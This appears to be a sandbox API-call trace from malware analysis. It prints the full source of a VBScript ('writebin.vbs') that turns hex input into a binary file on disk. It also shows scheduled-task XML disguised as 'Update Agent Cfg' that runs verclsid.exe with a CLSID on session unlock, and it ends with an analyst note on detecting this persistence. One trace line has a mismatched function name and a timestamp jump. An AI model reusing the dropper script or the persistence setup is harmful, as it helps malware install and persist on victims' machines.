[0376.295] ITypeLib:GetTypeInfoOfGuid (in: This=0x30d440, GUID=0xfff449b0*(Data1=0x91afbd1b, Data2=0x5feb, Data3=0x43f5, Data4=([0]=0xb0, [1]=0x28, [2]=0xe2, [3]=0xca, [4]=0x96, [5]=0x6, [6]=0x17, [7]=0xec)), ppTInfo=0x20e9d8 | out: ppTInfo=0x20e9d8*=0x30e828) returned 0x0
[0376.300] ITypeInfo:GetRefTypeOfImplType (in: This=0x30e828, index=0xffffffff, pRefType=0x20e9d0 | out: pRefType=0x20e9d0*=0xfffffffe) returned 0x0
[0376.300] ITypeInfo:GetRefTypeInfo (in: This=0x30e828, hreftype=0xfffffffe, ppTInfo=0xfff4d638 | out: ppTInfo=0xfff4d638*=0x30e880) returned 0x0
[0376.300] IUnknown:Release (This=0x30e828) returned 0x1
[0376.300] ??2@YAPEAX_K@Z () returned 0xf58c0
[0376.300] SafeArrayPutElement (psa=0x307570, rgIndices=0x20e9e8, pv=0x20e998) returned 0x0
[0376.300] SafeArrayPutElement (psa=0x307570, rgIndices=0x20e9e8, pv=0x20e998) returned 0x0
[0376.300] ??2@YAPEAX_K@Z () returned 0xf5960
[0376.301] ??2@YAPEAX_K@Z () returned 0xf59c0
[0376.301] SafeArrayPutElement (psa=0x307670, rgIndices=0x20e988, pv=0x20e928) returned 0x0
[0376.301] SafeArrayPutElement (psa=0x307670, rgIndices=0x20e988, pv=0x20e928) returned 0x0
[0376.301] ITypeLib:GetTypeInfoOfGuid (in: This=0x30d440, GUID=0xfff44f50*(Data1=0x2cc5a9d0, Data2=0xb1e5, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x86, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x20e9d8 | out: ppTInfo=0x20e9d8*=0x30e8d8) returned 0x0
[0376.301] ITypeInfo:GetRefTypeOfImplType (in: This=0x30e8d8, index=0xffffffff, pRefType=0x20e9d0 | out: pRefType=0x20e9d0*=0xfffffffe) returned 0x0
[0376.301] ITypeInfo:GetRefTypeInfo (in: This=0x30e8d8, hreftype=0xfffffffe, ppTInfo=0xfff4d6b8 | out: ppTInfo=0xfff4d6b8*=0x30e930) returned 0x0
[0376.301] IUnknown:Release (This=0x30e8d8) returned 0x1
[0376.301] ITypeLib:GetTypeInfoOfGuid (in: This=0x30d440, GUID=0xfff44f60*(Data1=0xbf64faf0, Data2=0x5906, Data3=0x426c, Data4=([0]=0xb4, [1]=0xbc, [2]=0x7b, [3]=0x75, [4]=0x3c, [5]=0xbe, [6]=0x81, [7]=0x9f)), ppTInfo=0x20e9d8 | out: ppTInfo=0x20e9d8*=0x30e988) returned 0x0
[0376.302] ITypeInfo:GetRefTypeOfImplType (in: This=0x30e988, index=0xffffffff, pRefType=0x20e9d0 | out: pRefType=0x20e9d0*=0xfffffffe) returned 0x0
[0376.302] ITypeInfo:GetRefTypeInfo (in: This=0x30e988, hreftype=0xfffffffe, ppTInfo=0xfff4d6f8 | out: ppTInfo=0xfff4d6f8*=0x30e9e0) returned 0x0
[0376.302] IUnknown:Release (This=0x30e988) returned 0x1
[0376.302] ITypeLib:GetTypeInfoOfGuid (in: This=0x30d440, GUID=0xfff44e20*(Data1=0x2cc5a9d1, Data2=0xb1e5, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x86, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x20e9d8 | out: ppTInfo=0x20e9d8*=0x30ea38) returned 0x0
[0376.302] ITypeInfo:GetRefTypeOfImplType (in: This=0x30ea38, index=0xffffffff, pRefType=0x20e9d0 | out: pRefType=0x20e9d0*=0xfffffffe) returned 0x0
[0376.302] ITypeInfo:GetRefTypeInfo (in: This=0x30ea38, hreftype=0xfffffffe, ppTInfo=0xfff4d678 | out: ppTInfo=0xfff4d678*=0x30ea90) returned 0x0
[0376.302] IUnknown:Release (This=0x30ea38) returned 0x1
[0376.302] IUnknown:Release (This=0x30d440) returned 0x4
[0376.302] ??2@YAPEAX_K@Z () returned 0xf5a20
[0376.302] GetCurrentThreadId () returned 0xc3c
[0376.302] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xd8
[0376.302] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xfff323e8, lpParameter=0xf5a20, dwCreationFlags=0x0, lpThreadId=0xf5a48 | out: lpThreadId=0xf5a48*=0xc44) returned 0xe0
[0376.304] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x20ec30*=0xd8, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
[0376.322] CloseHandle (hObject=0xd8) returned 1
[0376.322] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\writebin.vbs", nBufferLength=0x104, lpBuffer=0x20ecc0, lpFilePart=0x20ecb0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\writebin.vbs", lpFilePart=0x20ecb0*="writebin.vbs") returned 0x31
[0376.322] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".vbs", ulOptions=0x0, samDesired=0x20019, phkResult=0x20e1d0 | out: phkResult=0x20e1d0*=0xf2) returned 0x0
[0376.323] RegQueryValueExW (in: hKey=0xf2, lpValueName=0x0, lpReserved=0x0, lpType=0x20e180, lpData=0x20e1e0, lpcbData=0x20e184*=0x800 | out: lpType=0x20e180*=0x1, lpData="VBSFile", lpcbData=0x20e184*=0x10) returned 0x0
[0376.323] RegCloseKey (hKey=0xf2) returned 0x0
[0376.323] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="VBSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20e1d0 | out: phkResult=0x20e1d0*=0xf2) returned 0x0
[0376.324] RegQueryValueExW (in: hKey=0xf2, lpValueName=0x0, lpReserved=0x0, lpType=0x20e180, lpData=0x20ea50, lpcbData=0x20e184*=0x200 | out: lpType=0x20e180*=0x1, lpData="VBScript", lpcbData=0x20e184*=0x12) returned 0x0
[0376.325] RegCloseKey (hKey=0xf2) returned 0x0
[0376.325] ??2@YAPEAX_K@Z () returned 0xf62b0
[0376.325] GetProcessHeap () returned 0x2e0000
[0376.325] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2000) returned 0x317460
[0376.325] CLSIDFromString (in: lpsz="VBScript", pclsid=0x20e9c8 | out: pclsid=0x20e9c8*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8))) returned 0x0
[0376.327] CoCreateInstance (in: rclsid=0x20e9c8*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xfff44828*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x20e9c0 | out: ppv=0x20e9c0*=0xf65e0) returned 0x0
[0376.351] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20cbe0 | out: lpSystemTimeAsFileTime=0x20cbe0*(dwLowDateTime=0xf863b780, dwHighDateTime=0x1dab598))
[0376.351] GetCurrentProcessId () returned 0xc38
[0376.351] GetCurrentThreadId () returned 0xc3c
[0376.351] GetTickCount () returned 0x142654d
[0376.351] QueryPerformanceCounter (in: lpPerformanceCount=0x20cbe8 | out: lpPerformanceCount=0x20cbe8*=2125704879980) returned 1
[0376.353] malloc (_Size=0x100) returned 0xf6470
[0376.353] __dllonexit () returned 0x7fef787bfc0
[0376.353] __dllonexit () returned 0x7fef787bfa8
[0376.354] __dllonexit () returned 0x7fef787bfd4
[0376.355] GetUserDefaultLCID () returned 0x409
[0376.355] GetVersion () returned 0x1db10106
[0376.356] ??2@YAPEAX_K@Z () returned 0xf6580
[0376.357] ??2@YAPEAX_K@Z () returned 0xf65e0
[0376.358] GetUserDefaultLCID () returned 0x409
[0376.358] GetACP () returned 0x4e4
[0376.359] ??3@YAXPEAX@Z () returned 0x61b5f601
[0376.360] GetCurrentThreadId () returned 0xc3c
[0376.360] ??2@YAPEAX_K@Z () returned 0xf6970
[0376.360] GetCurrentThreadId () returned 0xc3c
[0376.360] ??2@YAPEAX_K@Z () returned 0xf6580
[0376.360] ??2@YAPEAX_K@Z () returned 0xf6a50
[0376.360] ??2@YAPEAX_K@Z () returned 0xf6a90
[0376.360] ??2@YAPEAX_K@Z () returned 0xf6b60
[0376.360] GetCurrentThreadId () returned 0xc3c
[0376.360] ??2@YAPEAX_K@Z () returned 0xf6ba0
[0376.361] GetUserDefaultLCID () returned 0x409
[0376.361] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
[0376.361] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x20e920, cchData=6 | out: lpLCData="1252") returned 5
[0376.361] IsValidCodePage (CodePage=0x4e4) returned 1
[0376.363] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefdf10000
[0376.364] GetProcAddress (hModule=0x7fefdf10000, lpProcName="CoCreateInstance") returned 0x7fefdf37490
[0376.364] CoCreateInstance (in: rclsid=0x7fef78cd5a8*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef78cd5b8*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0xf6928 | out: ppv=0xf6928*=0x31e9a0) returned 0x0
[0376.364] IUnknown:AddRef (This=0x31e9a0) returned 0x2
[0376.364] GetCurrentProcessId () returned 0xc38
[0376.364] GetCurrentThreadId () returned 0xc3c
[0376.364] GetTickCount () returned 0x142655d
[0376.364] ISystemDebugEventFire:BeginSession (This=0x31e9a0, guidSourceID=0x7fef78cd5d8, strSessionName="VBScript:00003128:00003132:21128541") returned 0x0
[0376.364] GetCurrentThreadId () returned 0xc3c
[0376.365] ??2@YAPEAX_K@Z () returned 0xf6c30
[0376.365] ??2@YAPEAX_K@Z () returned 0xf6c80
[0376.365] malloc (_Size=0x80) returned 0xf6d80
[0376.365] malloc (_Size=0x108) returned 0xf6e10
[0376.365] memcpy (in: _Dst=0xf6e58, _Src=0x306648, _Size=0x10 | out: _Dst=0xf6e58) returned 0xf6e58
[0376.365] GetCurrentThreadId () returned 0xc3c
[0376.365] ??2@YAPEAX_K@Z () returned 0xf6f20
[0376.365] memcpy (in: _Dst=0xf6ea8, _Src=0x30c6f8, _Size=0x8 | out: _Dst=0xf6ea8) returned 0xf6ea8
[0376.366] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\writebin.vbs" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\writebin.vbs"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x10c
[0376.366] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2ee
[0376.366] CreateFileMappingA (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2ee, lpName=0x0) returned 0x110
[0376.366] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x230000
[0376.366] GetVersionExA (in: lpVersionInformation=0x20ead0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xfd9328b1, dwBuildNumber=0x7fe, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x20ead0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0376.366] IsTextUnicode (in: lpv=0x230000, iSize=750, lpiResult=0x20eac0 | out: lpiResult=0x20eac0) returned 0
[0376.367] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" :::hx = replace(wscript.arguments(0),\" \",\"\")\r\n :::file = wscript.arguments(1)\r\n :::\r\n :::length = len(hx)/2 : if length mod 2 then hx = hx & \"00\"\r\n :::\r\n :::s = \"\"\r\n :::for i=1 to len(hx) step 4\r\n ::: s = s & chrW(clng(\"&H\" & mid(hx,i,2)) + clng(\"&H\" & mid(hx,i+2,2)) * 256)\r\n :::next\r\n :::\r\n :::typeBin = 1 : typeText = 2 : bOverwrite = 2\r\n :::with CreateObject(\"ADODB.Stream\")\r\n ::: .type = typeText : .open : .writeText s : .saveToFile file, bOverwrite : .close\r\n ::: .type = typeBin : .open : .loadFromFile file : .position = 2 : data = .read(length)\r\n ::: .position = 0 : .write data\r\n ::: .position = length : .setEOS\r\n ::: .saveToFile file, bOverwrite\r\n ::: .close\r\n :::end with", cbMultiByte=750, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 750
[0376.367] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" :::hx = replace(wscript.arguments(0),\" \",\"\")\r\n :::file = wscript.arguments(1)\r\n :::\r\n :::length = len(hx)/2 : if length mod 2 then hx = hx & \"00\"\r\n :::\r\n :::s = \"\"\r\n :::for i=1 to len(hx) step 4\r\n ::: s = s & chrW(clng(\"&H\" & mid(hx,i,2)) + clng(\"&H\" & mid(hx,i+2,2)) * 256)\r\n :::next\r\n :::\r\n :::typeBin = 1 : typeText = 2 : bOverwrite = 2\r\n :::with CreateObject(\"ADODB.Stream\")\r\n ::: .type = typeText : .open : .writeText s : .saveToFile file, bOverwrite : .close\r\n ::: .type = typeBin : .open : .loadFromFile file : .position = 2 : data = .read(length)\r\n ::: .position = 0 : .write data\r\n ::: .position = length : .setEOS\r\n ::: .saveToFile file, bOverwrite\r\n ::: .close\r\n :::end with", cbMultiByte=750, lpWideCharStr=0x31ea18, cchWideChar=750 | out: lpWideCharStr=" :::hx = replace(wscript.arguments(0),\" \",\"\")\r\n :::file = wscript.arguments(1)\r\n :::\r\n :::length = len(hx)/2 : if length mod 2 then hx = hx & \"00\"\r\n :::\r\n :::s = \"\"\r\n :::for i=1 to len(hx) step 4\r\n ::: s = s & chrW(clng(\"&H\" & mid(hx,i,2)) + clng(\"&H\" & mid(hx,i+2,2)) * 256)\r\n :::next\r\n :::\r\n :::typeBin = 1 : typeText = 2 : bOverwrite = 2\r\n :::with CreateObject(\"ADODB.Stream\")\r\n ::: .type = typeText : .open : .writeText s : .saveToFile file, bOverwrite : .close\r\n ::: .type = typeBin : .open : .loadFromFile file : .position = 2 : data = .read(length)\r\n ::: .position = 0 : .write data\r\n ::: .position = length : .setEOS\r\n ::: .saveToFile file, bOverwrite\r\n ::: .close\r\n :::end with") returned 750
[0376.367] UnmapViewOfFile (lpBaseAddress=0x230000) returned 1
[0376.389] CloseHandle (hObject=0x110) returned 1
[0376.389] CloseHandle (hObject=0x10c) returned 1
[0376.389] GetSystemDirectoryA (in: lpBuffer=0x20eb48, uSize=0x0 | out: lpBuffer="") returned 0x14
[0376.389] ??2@YAPEAX_K@Z () returned 0xf65b0
[0376.389] GetSystemDirectoryA (in: lpBuffer=0xf65b0, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0376.389] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x7feff870000
[0376.389] ??3@YAXPEAX@Z () returned 0x61b5f601
[0376.390] GetProcAddress (hModule=0x7feff870000, lpProcName="SaferIdentifyLevel") returned 0x7feff88e470
[0376.390] GetProcAddress (hModule=0x7feff870000, lpProcName="SaferComputeTokenFromLevel") returned 0x7feff88f9b0
[0376.390] GetProcAddress (hModule=0x7feff870000, lpProcName="SaferCloseLevel") returned 0x7feff88f660
[0376.390] IdentifyCodeAuthzLevelW () returned 0x1
[0376.513] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20dcc0 | out: lpSystemTimeAsFileTime=0x20dcc0*(dwLowDateTime=0xf87b8540, dwHighDateTime=0x1dab598))
[0376.513] GetCurrentProcessId () returned 0xc38
[0376.513] GetCurrentThreadId () returned 0xc3c
[0376.513] GetTickCount () returned 0x14265e9
[0376.513] QueryPerformanceCounter (in: lpPerformanceCount=0x20dcc8 | out: lpPerformanceCount=0x20dcc8*=2125721043309) returned 1
[0376.513] malloc (_Size=0x100) returned 0xf7710
[0376.514] GetVersionExA (in: lpVersionInformation=0x20daa0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xf784f810, dwBuildNumber=0x7fe, dwPlatformId=0xf7840000, szCSDVersion="þ\x07") | out: lpVersionInformation=0x20daa0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0376.514] GetUserDefaultLCID () returned 0x409
[0376.514] IsFileSupportedName () returned 0x1
[0376.514] _wcsicmp (_String1=".vbs", _String2=".vbs") returned 0
[0376.527] GetSignedDataMsg () returned 0x0
[0376.527] GetCurrentProcess () returned 0xffffffffffffffff
[0376.527] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x110, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x20e2e0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x20e2e0*=0x13c) returned 1
[0376.527] GetFileSize (in: hFile=0x13c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2ee
[0376.527] ??2@YAPEAX_K@Z () returned 0xf9ae0
[0376.527] SetFilePointer (in: hFile=0x13c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
[0376.527] ReadFile (in: hFile=0x13c, lpBuffer=0xf9ae0, nNumberOfBytesToRead=0x2ee, lpNumberOfBytesRead=0x20e2c0, lpOverlapped=0x0 | out: lpBuffer=0xf9ae0*, lpNumberOfBytesRead=0x20e2c0*=0x2ee, lpOverlapped=0x0) returned 1
[0376.528] CoInitialize (pvReserved=0x0) returned 0x1
[0376.528] CoCreateInstance (in: rclsid=0x7fef784f850*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef784f860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x20e230 | out: ppv=0x20e230*=0xfa7b0) returned 0x0
[0376.546] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20c450 | out: lpSystemTimeAsFileTime=0x20c450*(dwLowDateTime=0xf8804800, dwHighDateTime=0x1dab598))
[0376.546] GetCurrentProcessId () returned 0xc38
[0376.546] GetCurrentThreadId () returned 0xc3c
[0376.546] GetTickCount () returned 0x1426609
[0376.546] QueryPerformanceCounter (in: lpPerformanceCount=0x20c458 | out: lpPerformanceCount=0x20c458*=2125724339501) returned 1
[0376.547] malloc (_Size=0x100) returned 0xf7820
[0376.547] __dllonexit () returned 0x7fef78014c0
[0376.547] __dllonexit () returned 0x7fef78014e8
[0376.547] GetVersionExA (in: lpVersionInformation=0x20c230*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7fe, dwMinorVersion=0xf7802dc9, dwBuildNumber=0x7fe, dwPlatformId=0xf78014e8, szCSDVersion="þ\x07") | out: lpVersionInformation=0x20c230*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0376.547] GetProcessWindowStation () returned 0x2c
[0376.548] GetUserObjectInformationA (in: hObj=0x2c, nIndex=1, pvInfo=0x20c218, nLength=0xc, lpnLengthNeeded=0x20c210 | out: pvInfo=0x20c218, lpnLengthNeeded=0x20c210) returned 1
[0376.548] ??2@YAPEAX_K@Z () returned 0xfa3a0
[0376.548] ??2@YAPEAX_K@Z () returned 0xf65b0
[0376.548] ??2@YAPEAX_K@Z () returned 0xfa3f0
[0376.548] ??2@YAPEAX_K@Z () returned 0xfa430
[0376.548] ??2@YAPEAX_K@Z () returned 0xfa470
[0376.548] ??2@YAPEAX_K@Z () returned 0xfa4b0
[0376.548] ??2@YAPEAX_K@Z () returned 0xfa4f0
[0376.548] ??2@YAPEAX_K@Z () returned 0xfa530
[0376.548] ??2@YAPEAX_K@Z () returned 0xfa570
[0376.548] ??2@YAPEAX_K@Z () returned 0xfa5b0
[0376.548] ??2@YAPEAX_K@Z () returned 0xfa5f0
[0376.549] ??3@YAXPEAX@Z () returned 0x61b5f601
[0376.549] ??2@YAPEAX_K@Z () returned 0xfa640
[0376.549] ??2@YAPEAX_K@Z () returned 0xfa680
[0376.549] DllGetClassObject (in: rclsid=0x31d430*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7fefe096cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x20cf00 | out: ppv=0x20cf00*=0x3edfb0) returned 0x0
[0376.550] memcpy (in: _Dst=0x20cd00, _Src=0xfa430, _Size=0x38 | out: _Dst=0x20cd00) returned 0x20cd00
[0376.550] ??2@YAPEAX_K@Z () returned 0x3edfb0
[0376.550] IClassFactory:CreateInstance (in: This=0x3edfb0, pUnkOuter=0x0, riid=0x20dce0*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x20cf20 | out: ppvObject=0x20cf20*=0xfa7b0) returned 0x0
[0376.550] ??2@YAPEAX_K@Z () returned 0xfa6c0
[0376.550] GetSystemInfo (in: lpSystemInfo=0x20cd60 | out: lpSystemInfo=0x20cd60*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x6a06))
[0376.551] VirtualQuery (in: lpAddress=0x20cdd0, lpBuffer=0x20cd90, dwLength=0x30 | out: lpBuffer=0x20cd90*(BaseAddress=0x20c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0376.551] ??2@YAPEAX_K@Z () returned 0xf65b0
[0376.551] ??2@YAPEAX_K@Z () returned 0xfa700
[0376.551] ??2@YAPEAX_K@Z () returned 0xfa760
[0376.551] ??2@YAPEAX_K@Z () returned 0xfa790
[0376.551] ??2@YAPEAX_K@Z () returned 0xfa840
[0376.551] IUnknown:AddRef (This=0xfa7b0) returned 0x2
[0376.551] IUnknown:Release (This=0xfa7b0) returned 0x1
[0376.551] IUnknown:Release (This=0x3edfb0) returned 0x0
[0376.552] ??3@YAXPEAX@Z () returned 0x61b5f601
[0376.552] IUnknown:QueryInterface (in: This=0xfa7b0, riid=0x7fef784f860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x20e168 | out: ppvObject=0x20e168*=0xfa7b0) returned 0x0
[0376.552] IUnknown:Release (This=0xfa7b0) returned 0x1
[0376.552] _strnicmp (_Str1=" \r\n \r\n \r\n2020-06-18T10:13:32.9293139 \r\nUpdate Agent Cfg \r\n\\Update_AgentConfig \r\n \r\n \r\n \r\nkEecfMwgj \r\n \r\n \r\n \r\ntrue \r\nSessionUnlock \r\nkEecfMwgj \r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\nIgnoreNew \r\nfalse \r\nfalse \r\n \r\nfalse \r\nfalse \r\n \r\ntrue \r\ntrue \r\nPT0S \r\n \r\n \r\n \r\n\"verclsid.exe\" \r\n/S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} \r\n \r\n \r\n \r\n", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1317
[0379.347] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=" \r\n \r\n \r\n2020-06-18T10:13:32.9293139 \r\nUpdate Agent Cfg \r\n\\Update_AgentConfig \r\n \r\n \r\n \r\nkEecfMwgj \r\n \r\n \r\n \r\ntrue \r\nSessionUnlock \r\nkEecfMwgj \r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\nIgnoreNew \r\nfalse \r\nfalse \r\n \r\nfalse \r\nfalse \r\n \r\ntrue \r\ntrue \r\nPT0S \r\n \r\n \r\n \r\n\"verclsid.exe\" \r\n/S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} \r\n \r\n \r\n \r\n", cbMultiByte=-1, lpWideCharStr=0x2b6128, cchWideChar=1317 | out: lpWideCharStr=" \r\n \r\n \r\n2020-06-18T10:13:32.9293139 \r\nUpdate Agent Cfg \r\n\\Update_AgentConfig \r\n \r\n \r\n \r\nkEecfMwgj \r\n \r\n \r\n \r\ntrue \r\nSessionUnlock \r\nkEecfMwgj \r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\nIgnoreNew \r\nfalse \r\nfalse \r\n \r\nfalse \r\nfalse \r\n \r\ntrue \r\ntrue \r\nPT0S \r\n \r\n \r\n \r\n\"verclsid.exe\" \r\n/S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} \r\n \r\n \r\n \r\n") returned 1317
[0379.347] SysStringLen (param_1=" \r\n \r\n \r\n2020-06-18T10:13:32.9293139 \r\nUpdate Agent Cfg \r\n\\Update_AgentConfig \r\n \r\n \r\n \r\nkEecfMwgj \r\n \r\n \r\n \r\ntrue \r\nSessionUnlock \r\nkEecfMwgj \r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\nIgnoreNew \r\nfalse \r\nfalse \r\n \r\nfalse \r\nfalse \r\n \r\ntrue \r\ntrue \r\nPT0S \r\n \r\n \r\n \r\n\"verclsid.exe\" \r\n/S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} \r\n \r\n \r\n \r\n") returned 0x524
[0379.347] VarBstrCat (in: bstrLeft=0x0, bstrRight=" \r\n \r\n \r\n2020-06-18T10:13:32.9293139 \r\nUpdate Agent Cfg \r\n\\Update_AgentConfig \r\n \r\n \r\n \r\nkEecfMwgj \r\n \r\n \r\n \r\ntrue \r\nSessionUnlock \r\nkEecfMwgj \r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\nIgnoreNew \r\nfalse \r\nfalse \r\n \r\nfalse \r\nfalse \r\n \r\ntrue \r\ntrue \r\nPT0S \r\n \r\n \r\n \r\n\"verclsid.exe\" \r\n/S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} \r\n \r\n \r\n \r\n", pbstrResult=0xcc928 | out: pbstrResult=0xcc928) returned 0x0
[0379.349] free (_Block=0x1d5fd0)
[0379.349] CloseHandle (hObject=0xf4) returned 1
[0379.349] lstrlenW (lpString="") returned 0
[0379.350] malloc (_Size=0x18) returned 0x1d5b50
[0379.350] SysStringLen (param_1="") returned 0x0
[0379.350] free (_Block=0x1d5b50)
[0379.350] lstrlenW (lpString="") returned 0
# Analyst note: this call registers the scheduled task. It returns 0x0 (S_OK) with flags=6
# (TASK_CREATE_OR_UPDATE) for the task path "\Update_AgentConfig_kEecfMwgj".
# The XML element names are missing from XmlText in this capture, so the reading of the surviving
# values is inferred: "SessionUnlock" looks like the trigger, "InteractiveToken" the logon type,
# and "verclsid.exe" with "/S /C {CLSID}" the action. TODO confirm against the registered task.
# Scheduled-task persistence is tracked as MITRE ATT&CK T1053.005. For detection, alert on task
# registrations whose action is verclsid.exe and resolve the CLSID's COM server registration
# (not visible in this excerpt) to see what is actually loaded.
